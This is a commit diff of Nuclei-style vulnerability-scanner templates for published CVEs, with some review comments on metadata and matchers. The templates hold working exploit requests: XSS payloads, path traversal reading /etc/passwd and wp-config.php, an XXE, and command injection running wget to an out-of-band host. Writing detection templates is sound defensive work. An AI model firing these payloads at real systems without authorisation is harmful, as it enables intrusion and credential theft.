- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "'></script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
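Review bot: The `info` block has no `description`, unlike every other template in this commit, so a hit reports a name and two links but nothing about what is vulnerable or where. Add one sentence under `severity:` derived from the path and matcher, e.g. `description: Reflected cross-site scripting in getid3/demos/demo.mimeonly.php of the Import Legacy Media plugin (<= 0.1) for WordPress via the filename parameter.` (drafted from the name and path here; confirm against the wpscan entry). The same field is missing in CVE-2014-4536 and CVE-2015-2807, and apparently in CVE-2015-9414, whose section is cut off at the end of this page.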


@ -0,0 +1,31 @@
id: CVE-2014-4536
info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
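Review bot: The body matcher looks for `"></script><script>alert(document.domain)</script>` (double quote), but none of the three injected parameters in the path produces that string: `contactId` decodes to `contactId'></script><script>alert(document.domain)</script>` (single quote, `%27`), and `go` and `campaignId` carry a `"><script>alert(document.cookie)</script>` payload with no leading `</script>` and a different alert argument. Unless the application rewrites quotes, the template can never fire; the matcher should be `- "'></script><script>alert(document.domain)</script>"` as in CVE-2014-4535, which uses the same `%27%3E%3C%2Fscript%3E` payload. The two unverified `document.cookie` payloads and the trailing `&` should also be dropped from the path so the request probes only what the matchers check.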


@ -0,0 +1,25 @@
id: CVE-2014-4940
info:
name: WordPress Plugin Tera Charts - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
reference: https://www.cvedetails.com/cve/CVE-2014-4940
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: CVE-2014-5368
info:
name: WordPress Plugin WP Content Source Control - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
reference: |
- https://www.exploit-db.com/exploits/39287
- https://www.cvedetails.com/cve/CVE-2014-5368
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200


@ -0,0 +1,31 @@
id: CVE-2014-8799
info:
name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
reference: |
- https://www.exploit-db.com/exploits/35346
- https://www.cvedetails.com/cve/CVE-2014-8799
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_USER"
- "DB_HOST"
part: body
condition: and
- type: status
status:
- 200


@ -15,7 +15,7 @@ info:
requests: requests:
- method: POST - method: POST
path: path:
- "{{BaseURL}}/" - "{{BaseURL}}"
headers: headers:
Referer: \x00 Referer: \x00


@ -0,0 +1,31 @@
id: CVE-2015-2807
info:
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
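Review bot: The info block has no `description`, unlike the traversal templates in this commit (e.g. CVE-2014-4940) which carry the advisory summary; a one-sentence description saying that the `wpbase` parameter of navis-documentcloud/js/window.php is reflected unescaped would let operators triage the finding without opening the references. The same omission applies to CVE-2015-9414, CVE-2016-1000139, CVE-2016-1000146, CVE-2016-1000148, CVE-2016-1000149, CVE-2016-1000153, CVE-2016-1000155 and CVE-2016-10993.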


@ -0,0 +1,31 @@
id: CVE-2015-9414
info:
name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -4,7 +4,10 @@ info:
name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128 description: Reflected XSS in wordpress plugin anti-plagiarism v3.60
reference: |
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161
- https://wordpress.org/plugins/anti-plagiarism
tags: cve,cve2016,wordpress,xss,wp-plugin tags: cve,cve2016,wordpress,xss,wp-plugin
requests: requests:
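Review bot: The NVD entry is removed from `reference` rather than kept alongside the two new links, so the template loses its one canonical pointer to the CVE record while gaining a vendor advisory and a plugin listing page. Keep `- https://nvd.nist.gov/vuln/detail/CVE-2016-1000128` as a third item under the new `reference:` list. The hunk for CVE-2019-16332 in this commit makes the same swap and should keep its NVD link too.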


@ -0,0 +1,33 @@
id: CVE-2016-1000139
info:
name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
tags: cve,cve2016,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain);</script><"'
- 'input type="text" name="ContactId"'
condition: and
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: CVE-2016-1000146
info:
name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,31 @@
id: CVE-2016-1000148
info:
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
tags: cve,cve2016,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script><"'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: CVE-2016-1000149
info:
name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: CVE-2016-1000153
info:
name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: CVE-2016-1000155
info:
name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,31 @@
id: CVE-2016-10993
info:
name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://www.vulnerability-lab.com/get_content.php?id=1808
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
tags: cve,cve2016,wordpress,wp-theme,xss
requests:
- method: GET
path:
- "{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
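Review bot: The request targets the site-wide search parameter `?s=` with nothing that establishes the ScoreMe theme is installed, so any WordPress site whose active theme reflects the search term unescaped would be attributed to CVE-2016-10993 (the `wp-theme` tag and the template id make a specific claim). If a theme fingerprint is available — a stylesheet path or a marker in the response body that identifies the theme — add it as a further `word` matcher under the existing `and` condition; otherwise the name and description should state that this is a generic search-reflection check rather than a ScoreMe-specific one.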


@ -0,0 +1,27 @@
id: CVE-2016-2389
info:
name: SAP xMII 15.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
reference: |
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- https://www.cvedetails.com/cve/CVE-2016-2389
tags: cve,cve2016,lfi,sap
requests:
- method: GET
path:
- "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -1,26 +1,36 @@
id: CVE-2017-12629 id: CVE-2017-12629
info: info:
name: Apache Solr <= 7.1 Remote Code Execution via SSRF name: Apache Solr <= 7.1 XML entity injection
author: dwisiswant0 author: dwisiswant0
severity: critical severity: critical
tags: cve,cve2017,solr,apache,rce,ssrf,oob tags: cve,cve2017,solr,apache,oob,xxe
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629 - https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- https://twitter.com/honoki/status/1298636315613974532/photo/1 - https://twitter.com/honoki/status/1298636315613974532
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
requests: requests:
- raw: - raw:
- | - |
GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1 GET /solr/admin/cores?wt=json HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
- | - |
GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1 GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
matchers: matchers:
- type: word - type: word
part: interactsh_protocol # Confirms the DNS Interaction part: interactsh_protocol # Confirms the HTTP Interaction
words: words:
- "dns" - "http"
extractors:
- type: regex
internal: true
name: core
group: 1
regex:
- '"name"\:"(.*?)"'
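Review bot: The reference list adds the vulhub CVE-2017-12629-RCE page although this same hunk removes the RunExecutableListener request and drops `rce` and `ssrf` from the tags, so the references no longer describe what the template checks. Keep only the XXE reference, or say in `name` that the RCE variant is not covered here. The new extractor also takes the first `"name"` field in the cores listing; if a response carries another `"name"` key ahead of the core name, `{{core}}` would be substituted with that value — worth confirming against a real `/solr/admin/cores?wt=json` response.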


@ -0,0 +1,28 @@
id: CVE-2017-14651
info:
name: Reflected XSS - WSO2 Data Analytics Server
author: mass0ma
severity: medium
description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
tags: cve,cve2017,wso2,xss
requests:
- method: GET
path:
- "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(document.domain)>"
- "Failed to add new collection"
part: body
condition: and
- type: word
words:
- "text/html"
part: header
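Review bot: The info block has no `reference` entry, so readers have nothing to consult for the affected versions beyond the one-line description, while the other new templates in this chunk carry at least one link. Add `reference: https://nvd.nist.gov/vuln/detail/CVE-2017-14651` (the NVD URL pattern the sibling templates use) next to `description`. A `status` matcher is also absent here though the sibling XSS templates include one; not required, since the `Failed to add new collection` string already pins the page, but worth adding for consistency.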


@ -0,0 +1,40 @@
id: CVE-2017-18024
info:
name: AvantFAX 3.3.3 XSS
author: pikpikcu
severity: medium
reference: |
- https://hackerone.com/reports/963798
- http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-18024
description: |
AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
tags: cve,cve2017,xss,avantfax
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=admin&_submit_check=1&jlbqg<script>alert("{{randstr}}")</script>b7g0x=1
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert("{{randstr}}")</script>'
- 'AvantFAX'
part: body
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"


@ -33,3 +33,8 @@ requests:
- '"name":' - '"name":'
- '"avatar_urls":' - '"avatar_urls":'
condition: and condition: and
extractors:
- type: regex
part: body
regex:
- '"name":"[^"]*"'
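Review bot: The extractor regex `'"name":"[^"]*"'` returns the whole match, so every extracted value carries the `"name":"` prefix and the closing quote instead of the bare name. Capture the value and select it: `- '"name":"([^"]*)"'` with `group: 1` alongside `part: body`. The enclosing request block starts outside the hunk.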


@ -0,0 +1,31 @@
id: CVE-20174011
info:
name: McAfee NDLP User-Agent XSS
author: geeknik
severity: medium
description: McAfee Network Data Loss Prevention (NDLP) 9.3.x allows remote attackers to get session/cookie information via modification of the HTTP request.
reference:
- https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab
- https://kc.mcafee.com/corporate/index?page=content&id=SB10198
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011
tags: cve,cve2017,mcafee,xss
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//
matchers-condition: and
matchers:
- type: word
part: body
words:
- "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"
- type: word
part: header
words:
- "text/html"
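Review bot: `id: CVE-20174011` is missing the hyphen between year and sequence number; both references in the info block spell it CVE-2017-4011, and anything that keys templates by CVE id would not associate this file with the CVE. Change the line to `id: CVE-2017-4011`. The LG NAS template in this commit has the same defect, `id: CVE-201810818`, where its own description says CVE-2018-10818.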


@ -0,0 +1,31 @@
id: CVE-2018-10095
info:
name: Dolibarr before 7.0.2 allows XSS.
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10095
tags: cve,cve2018,xss,dolibarr
requests:
- method: GET
path:
- "{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html


@ -0,0 +1,42 @@
id: CVE-201810818
info:
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
reference: |
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
tags: cve,cve2018,lg-nas,rce,oob
requests:
- raw:
- |
POST /system/sharedir.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&uid=10; wget http://{{interactsh-url}}
- |
POST /en/php/usb_sync.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&act=sync&task_number=1;wget http://{{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2018-14013
info:
name: Zimbra XSS
author: pikpikcu
severity: medium
description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013
tags: cve,cve2018,xss,zimbra
requests:
- method: GET
path:
- "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html


@ -0,0 +1,21 @@
id: CVE-2018-15517
info:
name: D-LINK Central WifiManager - SSRF
description: Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser.
reference:
- http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
author: gy741
severity: medium
tags: cve,cve2018,dlink,ssrf,oob
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"


@ -0,0 +1,27 @@
id: CVE-2018-15745
info:
name: Argus Surveillance DVR - Directory Traversal
author: gy741
severity: high
description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
reference: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
tags: cve,cve2018,argussurveillance,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "for 16-bit app support"
- "[drivers]"
condition: and


@ -0,0 +1,31 @@
id: CVE-2018-16167
info:
name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
reference: |
- https://www.exploit-db.com/exploits/49918
- https://nvd.nist.gov/vuln/detail/CVE-2018-16167
tags: cve,cve2018,logontracer,rce,oob
requests:
- raw:
- |
POST /upload HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"


@ -0,0 +1,27 @@
id: CVE-2018-16288
info:
name: LG SuperSign EZ CMS 2.5 - Local File Inclusion
author: daffainfo
severity: high
description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
reference: |
- https://www.exploit-db.com/exploits/45440
- https://www.cvedetails.com/cve/CVE-2018-16288
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2018-19458
info:
name: PHP Proxy 3.0.3 - Local File Inclusion
author: daffainfo
severity: high
description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246.
reference: |
- https://www.exploit-db.com/exploits/45780
- https://www.cvedetails.com/cve/CVE-2018-19458
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?q=file:///etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: CVE-2018-20470
info:
name: Sahi pro 7.x/8.x - Directory Traversal
author: daffainfo
severity: high
description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
reference: |
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
- https://www.cvedetails.com/cve/CVE-2018-20470
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body


@ -18,7 +18,7 @@ requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/" - "{{BaseURL}}"
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -0,0 +1,31 @@
id: CVE-2018-5233
info:
name: Grav CMS before 1.3.0 allows XSS.
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5233
tags: cve,cve2018,xss,grav
requests:
- method: GET
path:
- "{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html


@ -0,0 +1,47 @@
id: CVE-2019-0193
info:
name: Apache Solr - DataImportHandler RCE
description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
author: pdteam
severity: critical
refrense: |
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
- https://paper.seebug.org/1009/
tags: cve,cve2019,apache,rce,solr,oob
requests:
- raw:
- |
GET /solr/admin/cores?wt=json HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close
- |
POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1
Host: {{Hostname}}
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
